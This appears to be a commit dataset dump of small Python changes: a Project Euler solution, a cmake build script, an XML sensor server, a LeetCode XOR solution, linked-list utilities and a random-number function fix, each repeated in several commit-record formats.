aurabhjn76/code-problems,marcoviappiani/code-problems,nacho-gil/code-problems,caoglish/code-problems,SterlingVix/code-problems,marcoviappiani/code-problems,ranveer-git/code-problems,diversedition/code-problems,ockang/code-problems,dwatson3/code-problems,patrickford/code-problems,rkho/code-problems,aloisdg/code-problems,modulexcite/code-problems,jmera/code-problems,rkho/code-problems,sethdame/code-problems,rkho/code-problems,SterlingVix/code-problems,cjjavellana/code-problems,ankur-anand/code-problems,hlan2/code-problems,marcoviappiani/code-problems,saurabhjn76/code-problems,faruzzy/code-problems,jefimenko/code-problems,dwatson3/code-problems,saurabhjn76/code-problems,BastinRobin/code-problems,AndrewKishino/code-problems,marcoviappiani/code-problems,ankur-anand/code-problems,dwatson3/code-problems,modulexcite/code-problems,aloisdg/code-problems,hlan2/code-problems,angelkar/code-problems,caoglish/code-problems,lgulliver/code-problems,sethdame/code-problems,sisirkoppaka/code-problems,angelkar/code-problems,faruzzy/code-problems,angelkar/code-problems,nickell-andrew/code-problems,sisirkoppaka/code-problems,sethdame/code-problems,lgulliver/code-problems,ockang/code-problems,sisirkoppaka/code-problems,patrickford/code-problems,jefimenko/code-problems,nacho-gil/code-problems,caoglish/code-problems,lgulliver/code-problems,jmera/code-problems,AndrewKishino/code-problems,faruzzy/code-problems,AndrewKishino/code-problems,ranveer-git/code-problems,netuoso/code-problems,BastinRobin/code-problems,diversedition/code-problems,rkho/code-problems,rkho/code-problems,hlan2/code-problems,patrickford/code-problems,saurabhjn76/code-problems,nacho-gil/code-problems,dwatson3/code-problems,jefimenko/code-problems,ranveer-git/code-problems,jmera/code-problems,tahoeRobbo/code-problems,nacho-gil/code-problems,ankur-anand/code-problems,angelkar/code-problems,nickell-andrew/code-problems,patrickford/code-problems,SterlingVix/code-problems,aloisdg/code-problems,patrickford/code-problems,modulexcite/code-problems,AndrewKishino/code-problems,rkho/code-problems,lgulliver/code-problems,tahoeRobbo/code-problems,sisirkoppaka/code-problems,BastinRobin/code-problems,tahoeRobbo/code-problems,jmera/code-problems,SterlingVix/code-problems,jefimenko/code-problems,jmera/code-problems,nacho-gil/code-problems,aloisdg/code-problems,Widea/code-problems,BastinRobin/code-problems,angelkar/code-problems,Widea/code-problems,SterlingVix/code-problems,jefimenko/code-problems,ankur-anand/code-problems,modulexcite/code-problems,dwatson3/code-problems,angelkar/code-problems,aloisdg/code-problems,ranveer-git/code-problems,blakeembrey/code-problems,Widea/code-problems,faruzzy/code-problems,angelkar/code-problems,netuoso/code-problems,sethdame/code-problems,modulexcite/code-problems,ranveer-git/code-problems,diversedition/code-problems,netuoso/code-problems,cjjavellana/code-problems,faruzzy/code-problems,tahoeRobbo/code-problems,aloisdg/code-problems,AndrewKishino/code-problems,nickell-andrew/code-problems,ankur-anand/code-problems,marcoviappiani/code-problems,cjjavellana/code-problems,nickell-andrew/code-problems,ockang/code-problems,AndrewKishino/code-problems,saurabhjn76/code-problems,cjjavellana/code-problems,saurabhjn76/code-problems,nacho-gil/code-problems,blakeembrey/code-problems,diversedition/code-problems,nacho-gil/code-problems,faruzzy/code-problems,Widea/code-problems,saurabhjn76/code-problems,patrickford/code-problems,BastinRobin/code-problems,diversedition/code-problems,Widea/code-problems,lgulliver/code-problems,angelkar/code-problems,diversedition/code-problems,lgulliver/code-problems,jmera/code-problems,nickell-andrew/code-problems,ankur-anand/code-problems,nickell-andrew/code-problems,cjjavellana/code-problems,dwatson3/code-problems,AndrewKishino/code-problems,sisirkoppaka/code-problems,sisirkoppaka/code-problems,hlan2/code-problems,netuoso/code-problems,akaragkiozidis/code-problems,rkho/code-problems,jmera/code-problems,sethdame/code-problems,BastinRobin/code-problems,caoglish/code-problems,caoglish/code-problems,blakeembrey/code-problems,akaragkiozidis/code-problems,nickell-andrew/code-problems,sethdame/code-problems,Widea/code-problems,patrickford/code-problems,cjjavellana/code-problems,ockang/code-problems,ranveer-git/code-problems,cjjavellana/code-problems,rkho/code-problems,modulexcite/code-problems,caoglish/code-problems,blakeembrey/code-problems,diversedition/code-problems,marcoviappiani/code-problems,blakeembrey/code-problems,sethdame/code-problems,BastinRobin/code-problems,SterlingVix/code-problems,ockang/code-problems,ankur-anand/code-problems,lgulliver/code-problems,BastinRobin/code-problems,akaragkiozidis/code-problems,nickell-andrew/code-problems
|
Add optimized multiples-of-3-and-5 in Python
|
from __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
<commit_before><commit_msg>Add optimized multiples-of-3-and-5 in Python<commit_after>
|
from __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
Add optimized multiples-of-3-and-5 in Pythonfrom __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
<commit_before><commit_msg>Add optimized multiples-of-3-and-5 in Python<commit_after>from __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
|
fb222d4e7a3ff33ac3f3e84e655f303b4d961246
|
support/jenkins/buildAllModulesWithErrors.py
|
support/jenkins/buildAllModulesWithErrors.py
|
import os
from subprocess import call
# To be called from the build folder in the OpenSpace
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-OPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
Add python script to build all modules with warnings as errors
|
Add python script to build all modules with warnings as errors
|
Python
|
mit
|
OpenSpace/OpenSpace,OpenSpace/OpenSpace,OpenSpace/OpenSpace,OpenSpace/OpenSpace
|
Add python script to build all modules with warnings as errors
|
import os
from subprocess import call
# To be called from the build folder in the OpenSpace
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-OPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
<commit_before><commit_msg>Add python script to build all modules with warnings as errors<commit_after>
|
import os
from subprocess import call
# To be called from the build folder in the OpenSpace
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-OPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
Add python script to build all modules with warnings as errorsimport os
from subprocess import call
# To be called from the build folder in the OpenSpace
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-OPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
<commit_before><commit_msg>Add python script to build all modules with warnings as errors<commit_after>import os
from subprocess import call
# To be called from the build folder in the OpenSpace
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-OPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
|
e7cf300f1a9e878c7a34a719442c71128892b9f3
|
server/xml_server.py
|
server/xml_server.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
Add initial implementation of XMLServer
|
Add initial implementation of XMLServer
|
Python
|
apache-2.0
|
Solucionamos/dummybmc
|
Add initial implementation of XMLServer
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
<commit_before><commit_msg>Add initial implementation of XMLServer<commit_after>
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
Add initial implementation of XMLServer#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
<commit_before><commit_msg>Add initial implementation of XMLServer<commit_after>#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
|
c0d38e490d6503209e08b1b5906b579339088714
|
data2sql/data2sql.py
|
data2sql/data2sql.py
|
# -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
Add script to convert data into sql
|
Add script to convert data into sql
|
Python
|
bsd-2-clause
|
rongxinyin/pge-adr,rongxinyin/pge-adr
|
Add script to convert data into sql
|
# -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
<commit_before><commit_msg>Add script to convert data into sql<commit_after>
|
# -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
Add script to convert data into sql# -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
<commit_before><commit_msg>Add script to convert data into sql<commit_after># -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
|
b354166b9d244b1b4a1092c2a77cb45f84bdea1d
|
leetcode/challenge/day01.py
|
leetcode/challenge/day01.py
|
"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
Add day1 of ht eleet code challenge
|
Add day1 of ht eleet code challenge
|
Python
|
mit
|
lemming52/white_pawn,lemming52/white_pawn
|
Add day1 of ht eleet code challenge
|
"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
<commit_before><commit_msg>Add day1 of ht eleet code challenge<commit_after>
|
"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
Add day1 of ht eleet code challenge"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
<commit_before><commit_msg>Add day1 of ht eleet code challenge<commit_after>"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
|
4dffd31c432df77f4a65f50d76d96d27079e7fe5
|
link-table/link_table.py
|
link-table/link_table.py
|
import copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
Add link list python implementation
|
Add link list python implementation
|
Python
|
apache-2.0
|
free-free/algorithm,free-free/algorithm
|
Add link list python implementation
|
import copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
<commit_before><commit_msg>Add link list python implementation<commit_after>
|
import copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
Add link list python implementationimport copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
<commit_before><commit_msg>Add link list python implementation<commit_after>import copy
class Node(object):
def __init__(self, val=None):
self.val = val
self.next = None
def reverse_link_table1(hd):
if hd == None or hd.next == None:
return hd
pre = hd
nxt = hd.next
while nxt.next!= None:
tmp = nxt.next
nxt.next = pre
pre = nxt
nxt = tmp
nxt.next = pre
hd.next = None
return nxt
def reverse_link_table2(hd):
cur = None
while hd is not None:
tmp = hd.next
hd.next = cur
cur = hd
hd = tmp
return cur
def create_link_table(vals):
hd = Node(vals[0])
cur = hd
for val in vals[1:]:
cur.next = Node(val)
cur = cur.next
return hd
def print_link_table(hd):
vals = []
while hd != None:
vals.append(hd.val)
hd = hd.next
print(vals)
def check_palindrome(hd):
is_palindrome = True
step = 0
fast_ptr = hd
slow_ptr = hd
# use fast and slow pointer to find the central pointer of link table
while fast_ptr and fast_ptr.next :
step += 1
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
left_hd = hd
# reverse right-side link table and return head pointer
right_hd = reverse_link_table2(slow_ptr)
# save right-side link table head pointer
right_tmp = right_hd
# check is a palindrome link table
for i in range(step):
if right_hd.val != left_hd.val:
is_palindrome = False
break
right_hd = right_hd.next
left_hd = left_hd.next
# reverse right-side link table to what it originally looks like
tmp_ptr = None
right_ptr = right_tmp
while tmp_ptr != slow_ptr:
nxt = right_ptr.next
right_ptr.next = tmp_ptr
tmp_ptr = right_ptr
right_ptr = nxt
return is_palindrome
def find_link_table_middle_point(hd):
fast_ptr = hd
slow_ptr = hd
while fast_ptr and fast_ptr.next:
fast_ptr = fast_ptr.next.next
slow_ptr = slow_ptr.next
return slow_ptr
hd = create_link_table('maed')
print_link_table(hd)
hd = reverse_link_table1(hd)
print_link_table(hd)
hd = reverse_link_table2(hd)
print_link_table(hd)
print(check_palindrome(hd))
print_link_table(hd)
mid_ptr = find_link_table_middle_point(hd)
print(mid_ptr.val)
|
|
c2dd4d666e5d68a387ea48cabb99006d778b6d56
|
rng.py
|
rng.py
|
def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
|
from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
Fix python random number generator.
|
Fix python random number generator.
|
Python
|
mit
|
